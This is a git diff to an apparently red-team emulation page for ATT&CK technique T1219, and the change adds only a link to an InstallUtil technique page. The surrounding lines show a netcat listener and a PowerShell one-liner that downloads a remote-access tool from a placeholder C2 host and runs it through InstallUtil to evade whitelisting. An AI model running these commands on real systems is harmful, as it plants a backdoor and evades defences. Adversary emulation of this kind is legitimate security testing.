--- a/Techniques/T1219/T1219.md
+++ b/Techniques/T1219/T1219.md
@@ -20,7 +20,7 @@
 ```
 nc -lvvp <port_of_C2>
 ```
-* Download and execute `aresskit.exe` on the victim host by leveraging `InstallUtil`:
+* Download and execute `aresskit.exe` on the victim host by leveraging [`InstallUtil`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1118/T1118.md):
 ```
 powershell Invoke-WebRequest -Uri "http://<ip_of_C2>/aresskit.exe" -OutFile %ALLUSERSPROFILE%\aresskit.exe & C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U %ALLUSERSPROFILE%\aresskit.exe
 ```
@@ -29,3 +29,4 @@ powershell Invoke-WebRequest -Uri "http://<ip_of_C2>/aresskit.exe" -OutFile %ALL
 
 * <https://github.com/BlackVikingPro/aresskit>
 * <https://stackoverflow.com/questions/34400546/could-not-load-file-or-assembly-operation-is-not-supported-exception-from-hres>
+* <https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1118/T1118.md>
